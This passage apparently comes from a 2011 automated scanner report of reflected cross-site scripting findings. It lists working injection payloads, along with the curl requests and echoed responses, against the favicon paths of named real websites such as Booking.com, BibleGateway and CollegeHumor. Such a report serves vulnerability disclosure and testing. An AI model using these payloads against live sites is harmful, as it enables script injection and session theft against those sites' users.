Set-Cookie: bg_id=00ab965157d8537e82c701009fe51263; path=/; domain=.biblegateway.com
Content-Length: 18832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="http://www.biblegateway.com/favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9" />
...[SNIP]...

6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6b8e--><script>alert(1)</script>f5a7c98118a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: bg_id=1183588a8508212bca1abb89a6cb2a8d; path=/; domain=.biblegateway.com
Content-Length: 18834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BibleGateway.com - W
...[SNIP]...
<input type="text" size="40" name="request" value="/favicon.icoe6b8e--><script>alert(1)</script>f5a7c98118a" />
...[SNIP]...

6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackplanet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3c8"><script>alert(1)</script>54790336890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f3c8"><script>alert(1)</script>54790336890 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackplanet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4
Edge-control: no-store
Page-Name: /3f3c8"><script>alert(1)</script>54790336890
Set-Cookie: user_guid=d41d8cd98f00b204e9800998ecf8427e.4d972bf5ab15e4.37665058; path=/
Cache-Control: no-cache, no-store, private
Content-Type: text/html; charset=utf-8
Content-Length: 77942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<base href="http://www.blackplanet.com/3f3c8"><script>alert(1)</script>54790336890" />
...[SNIP]...

6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f4c'-alert(1)-'19aa576003b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6f4c'-alert(1)-'19aa576003b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=gj6oi7nrchu34cjuu1pvhmt7g1; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
hEngine(
           "http://www.blurtit.com/inc/"+name+".src",
           "http://www.blurtit.com/inc/"+name+"."+ext,
           name,cat);
       
   }
   else{
       errorMsg(name,ext,cat);
   }
}
var currentPage = '/favicon.icob6f4c'-alert(1)-'19aa576003b';
//-->
...[SNIP]...

6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e95"><script>alert(1)</script>0dbcb03d99f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By:
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:27:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: PHPSESSID=3fuii4e2ro74fkn0ag29lot583; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 16266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="large_modal" script="/zone.php" return="/favicon.ico27e95"><script>alert(1)</script>0dbcb03d99f" resource="">
...[SNIP]...

6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31d83"><script>alert(1)</script>f038581b329 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico31d83"><script>alert(1)</script>f038581b329 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.booking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:46 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.booking.com
Content-Length: 38617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                                                                                                                               
...[SNIP]...
<meta property="og:url" content="http://www.booking.com/favicon.ico31d83"><script>alert(1)</script>f038581b329" />
...[SNIP]...

6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c2b1<script>alert(1)</script>d7b417a0868 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7c2b1<script>alert(1)</script>d7b417a0868 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%3FN%3D0%26D%3Dx%26Ntt%3D7c2b1%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed7b417a0868%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026034; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=C8D8B00D722639114CC9D968B79ED1FF.vision1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25260

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"7c2b1<script>alert(1)</script>d7b417a0868"</span>
...[SNIP]...

6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d827'%3balert(1)//f900ae9d4e1 was submitted in the REST URL parameter 1. This input was echoed as 3d827';alert(1)//f900ae9d4e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3d827'%3balert(1)//f900ae9d4e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:45 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: lapg=%2F3d827%27%3FN%3D0%26D%3Dx%26Ntt%3D3d827%27%3Balert%281%29%2F%2Ff900ae9d4e1%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: bzid=1301753025507; Expires=Tue, 30-Mar-2021 14:03:45 GMT; Path=/
Set-Cookie: JSESSIONID=C0D0FFA84BA2B8122526460BFC309C71.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28216

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('3d827';alert(1)//f900ae9d4e1');</script>
...[SNIP]...

6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8110a</title><script>alert(1)</script>09446e4c092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8110a</title><script>alert(1)</script>09446e4c092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:03:46 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: lapg=%2F8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%3FN%3D0%26D%3Dx%26Ntt%3D8110a%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E09446e4c092%26top%3Dyes; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: bzid=1301753026723; Expires=Tue, 30-Mar-2021 14:03:46 GMT; Path=/
Set-Cookie: JSESSIONID=985D75A4878160C26E5AC58466A0042F.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28575

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;8110a</title><script>alert(1)</script>09446e4c092&#8221;</title>
...[SNIP]...

6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0af"><script>alert(1)</script>e4e99b75a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:45:06 GMT
Server: Apache
Set-Cookie: lang=en; path=/
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:06 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 9848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Page You Requested Was N
...[SNIP]...
<a href="/favicon.ico4e0af"><script>alert(1)</script>e4e99b75a76/es">
...[SNIP]...

6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13a1d<script>alert(1)</script>c642b5d4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico13a1d<script>alert(1)</script>c642b5d4bda HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 14:09:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1D6D0BAF1D692C9DD311319A3C3F0A3B; Path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//favicon.ico13a1d<script>alert(1)</script>c642b5d4bda</i>
...[SNIP]...

6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8cf7"><script>alert(1)</script>c187a66e885 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc8cf7"><script>alert(1)</script>c187a66e885 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colbertnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Type: text/html
Content-Length: 24243
Cache-Control: max-age=3593
Date: Sat, 02 Apr 2011 14:19:11 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <he
...[SNIP]...
<link rel="canonical" href="http://www.colbertnation.com/favicon.icoc8cf7"><script>alert(1)</script>c187a66e885" />
...[SNIP]...

6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f7f8"-alert(1)-"6131f1d2df4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1f7f8"-alert(1)-"6131f1d2df4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:04 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bfd7f48759b88f74f115a942a0192cab528325b5; expires=Fri, 01-Apr-2016 18:41:55 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico1f7f8"-alert(1)-"6131f1d2df4";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico1f7f8"-alert(1
...[SNIP]...

6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 884c7'-alert(1)-'3ff612d36a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico884c7'-alert(1)-'3ff612d36a6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:38:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:38:07 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:38:06 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=bd254816c761ff323b0d89497568c5a23e743eab; expires=Fri, 01-Apr-2016 18:41:57 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
)-'3ff612d36a6";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico884c7'-alert(1)-'3ff612d36a6';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvODg0YzcnLWFsZXJ0KDEpLSczZmY2MTJkMzZhNg==';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0;

...[SNIP]...

6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0e55"-alert(1)-"d509def4047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f0e55"-alert(1)-"d509def4047=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:15 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:14 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=43262f6ac8638772c644f10a51cc6ea9b97bea3c; expires=Fri, 01-Apr-2016 18:41:05 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
"5480.iac.collegehumor";
jument.cookie.domain = ".collegehumor.com";
jument.home_url = "http://www.collegehumor.com";
jument.this_url = "http://www.collegehumor.com/favicon.ico?f0e55"-alert(1)-"d509def4047=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico?f0e55"-aler
...[SNIP]...

6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1307'-alert(1)-'314d4297df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e1307'-alert(1)-'314d4297df=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:37:18 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:37:17 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b73f2f66647214b22889eaac093d9555c93cbeac; expires=Fri, 01-Apr-2016 18:41:08 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
'314d4297df=1";
jument.user_id = 0;

// CH8 STUFF
var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/favicon.ico?e1307'-alert(1)-'314d4297df=1';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvP2UxMzA3Jy1hbGVydCgxKS0nMzE0ZDQyOTdkZj0x';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0
...[SNIP]...

6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b192--><a>42b747ad359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico3b192--><a>42b747ad359 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56159
Date: Sat, 02 Apr 2011 14:20:35 GMT
X-Varnish: 878005268
Age: 0
Via: 1.1 varnish
Connection: keep-alive
